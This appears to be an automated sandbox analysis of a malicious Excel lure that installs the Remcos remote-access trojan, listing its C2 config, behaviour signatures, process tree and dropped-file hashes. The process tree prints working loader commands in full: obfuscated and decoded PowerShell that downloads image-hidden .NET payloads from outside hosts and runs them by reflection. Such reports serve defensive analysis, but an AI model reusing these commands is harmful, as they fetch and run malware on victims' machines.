Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    27-03-2024 06:51

General

  • Target

    RFQ No. 5490490.xla.xls

  • Size

    49KB

  • MD5

    dba95d2f630d7e2acde0f139b9bbaf2e

  • SHA1

    5396681f648bec74056b55bd01a265eba43c2fc6

  • SHA256

    f5ab99bae38d4910c1786a50abbfb3bd3c7b80e87ad86d5ce08405a9b571bce6

  • SHA512

    1e8621a1098b6711b389f9876b8b7f656d80e64e893423e6d15d22bbc34e510c4382467cd65d333a57c8a5c1c6472acca5c58c3ed1fda27a3d287fae4aefad1f

  • SSDEEP

    1536:iX68U7CPCEj2CqAQO5MQC23zMt0X5z/v5/bH:iX68ZaEj2Ch5J3y0dX5

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

107.172.31.178:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-NVSJ5U

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 10 IoCs
  • Abuses OpenXML format to download file from external location
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\RFQ No. 5490490.xla.xls"
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1680
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:944
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2124
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sheissosweetgirl.vbs"
        2⤵
        • Blocklisted process makes network request
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:988
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreFIDgTreUwBLDgTreC8DgTrecgBzDgTreGsDgTreLwBwDgTreHDgTreDgTrebQBhDgTreHgDgTreLwDgTre2DgTreDEDgTreMgDgTreuDgTreDMDgTreMQDgTrexDgTreC4DgTreNQDgTre3DgTreDEDgTreLgDgTre3DgTreDDgTreDgTreMQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreUwB3DgTreGUDgTreZQB0DgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          3⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2480
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RSK/rsk/ppmax/612.311.571.701//:ptth' , '1' , 'C:\ProgramData\' , 'Sweet','RegAsm',''))} }"
            4⤵
            • Blocklisted process makes network request
            • Adds Run key to start application
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3036
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Sweet.vbs
              5⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1764
            • C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
              5⤵
                PID:2192

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        9143bc4d15c879aafadee17b1a1ff889

        SHA1

        513bb50faae306d0e13e7273d8d0c3a9a16a4b87

        SHA256

        4e49cb77bcf075fa0549986e8e5bfe14f6e51dc1b177d1a5031d28dfcbf38c06

        SHA512

        8c5a09c593fa3ea25afff8d8b94850b91b31fe205b094843a275d2c8369df61767843beb25d1a2fa496e3d841a8e07b65c87e68fe8d358dda910b70507642ed2

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

        Filesize

        344B

        MD5

        2e305433f3c24d002859d3e81783e651

        SHA1

        8fa6e886ca5481f17d87ec8245f039a1185b56e4

        SHA256

        e95d01e0c261353e433969fed69a213e52e79bbcaccfb88d97f490455a746104

        SHA512

        91c7c8eb53e72e3688b3daea92143ad60862acedfd7de1504bd580458682cb3b345255fe349a8ed72f48c6c3731ced760c966e654dcf64eec73e660a5cc037f5

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

        Filesize

        242B

        MD5

        00c166931e68c41c0c130a6a3f3c5a40

        SHA1

        2df3d5b4120f387e874caf57b6a40a9d413c79db

        SHA256

        9069ea15f0001e08500830313a2464f617777931d9e02938131f1b6e83ed329a

        SHA512

        4d53188d71ffde68ab0cea77f9d3a34156db6067b9005b566112e5d1f355c48123df0c4624f010fef205d1c43685f9eb9b124ab283c2c61021a5f8a679a4ec37

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{E7598229-6748-457E-8980-AC2A94C4EECE}.FSD

        Filesize

        128KB

        MD5

        03280a790db3bc0d6b24e7e3440c5557

        SHA1

        05b00cb4981c371cc2a9485583be7c42743f8015

        SHA256

        39a931182772539ba847cf5769321adf7f573db2012ed9b83fa25d1c87add363

        SHA512

        6422fde72d464f3bf835d2c4b4c916bbbd8b3363e3c2c144f7b44660db1c3b398c7e3807b96cf8ed579e5b87ccfbe4fd614ed9223d3ae3a672d658b5c0fc5627

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

        Filesize

        128KB

        MD5

        d934adfd1a3e307df805c587dc3374ca

        SHA1

        d59e3e45bda3e07bb23aaa8bebc162df2bba1db2

        SHA256

        d91f51de96971dee23b75645dde8ad358bb5085dd60ae94e953f7b64097f1841

        SHA512

        c74554c0f63cb331d11e9a4cf6f91ff07cd2c3b44cbae67bd9686ed83b09ffc2c6dfea92e0bed885a8320ad94435c0d8adc0ae16bf2c00da24b063ef68662947

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S3QTRYMQ\kissofsosweetgirlwithabeautifullipssheneverexpectedthatkissfromemwhatabeautifulgirlshesis_____sheisluckygirlforkissing[1].doc

        Filesize

        73KB

        MD5

        afc0fdcc9bd5c6afdb060d0b6101babc

        SHA1

        3581cfd24a7b538b79854a84c751cbfeece74fd9

        SHA256

        302c63158c0f6d25a02f599b7b36cb4070dc82235b6ff4cd8647326471f367bd

        SHA512

        9cdbc20bc96500e72ee57fc49b6c064b1d98ea776e85bbabc844a2b8d5c3ae509df74bf63be34b44b9d0fa0882deb9c5329de319d04fba20d89e641290f7be06

      • C:\Users\Admin\AppData\Local\Temp\TarED0E.tmp

        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

      • C:\Users\Admin\AppData\Local\Temp\{9A2E563D-1738-43E9-ACD9-3C3C0E124478}

        Filesize

        128KB

        MD5

        6afb9f862374236d9e2ce1c4464ef775

        SHA1

        1395de0d3344e5d7e4410327cb9caad541cdc1b4

        SHA256

        3fb1a17826787e7e47bfca6f26a856264e00a1b0886b5d3fced266c82223d3df

        SHA512

        813a836b841a01419277501fbb5cc8861d9572176e675401ee077c905656d894424660acfaf1d9a2acc084c48934b05ff45c71b4bdaaa932f4b4b098f6e43cf8

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

        Filesize

        20KB

        MD5

        89af68074f863241b383e420fb059c94

        SHA1

        743666f8fcf6ff76c4ce66f94d654a3a8e6a57b9

        SHA256

        e085710809ba75065950ca58bb52dbe637fe6d315e56fd91680b707719da2b8c

        SHA512

        2750fd3956354bbbb3770655cd0cd0aa0d458b7ead67b6ab4e16d4b6f498ed694eb0c7396407cbcb83db2b62285419cfced436b21d91d686d9db13f89af2cec4

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\UCK62I9C.txt

        Filesize

        70B

        MD5

        f342c24448da91decbf4b29e4b8c642f

        SHA1

        bcb931f8f533dafe14316aa6a262ac943831fbf1

        SHA256

        596d9f0e67157b272c8cbf4354ba08ab57aadbaa577d07cec5f1e5e4eaf21102

        SHA512

        59dbbe8916b4d0ca8a9b849a7dbe644b7ef298ed9174f09feb52b39654f8d593633c494a5b58ce13917c14341dfbaa607593f50025729048f6cb037fa7968c28

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

        Filesize

        7KB

        MD5

        8da71bc251d9d4f1c98b51fc09193004

        SHA1

        08521a97d3fc9cf2d8e578a2e70a5e33a246727d

        SHA256

        659569ce5e1c213529085a02c2941dc1a828cfd583e7820e881247449125328b

        SHA512

        5a29399635b0e47c2ee4a7d5f60fe5c6899460bff115321ae49c7c5294452efba375bf57be1a4354502e43043c3550f2cb93e63e9bb355137aee14952b57d94a

      • C:\Users\Admin\AppData\Roaming\sheissosweetgirl.vbs

        Filesize

        5KB

        MD5

        fcebf77685e8413e80fa4f5d130b15df

        SHA1

        9f7f9cd7d2855b9a9a4347a9e7ec62b02674e423

        SHA256

        b3ce89dfcf48a2e8c579e15737a0732f0323e394386c6b332cdbd32a784719b9

        SHA512

        3ed95898783f103bc29f5baaac7beb4a09208b81182daf565085240f216f144e0827b71c4e6a988e74e80df1d062632b3678c77357fa5ed5b83619381f58481e

      • memory/1680-16-0x00000000007F0000-0x00000000007F2000-memory.dmp

        Filesize

        8KB

      • memory/1680-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/1680-118-0x0000000071D8D000-0x0000000071D98000-memory.dmp

        Filesize

        44KB

      • memory/1680-1-0x0000000071D8D000-0x0000000071D98000-memory.dmp

        Filesize

        44KB

      • memory/1680-80-0x0000000071D8D000-0x0000000071D98000-memory.dmp

        Filesize

        44KB

      • memory/1764-241-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

      • memory/1764-237-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

      • memory/1764-236-0x0000000002B20000-0x0000000002B60000-memory.dmp

        Filesize

        256KB

      • memory/1764-235-0x0000000073780000-0x0000000073D2B000-memory.dmp

        Filesize

        5.7MB

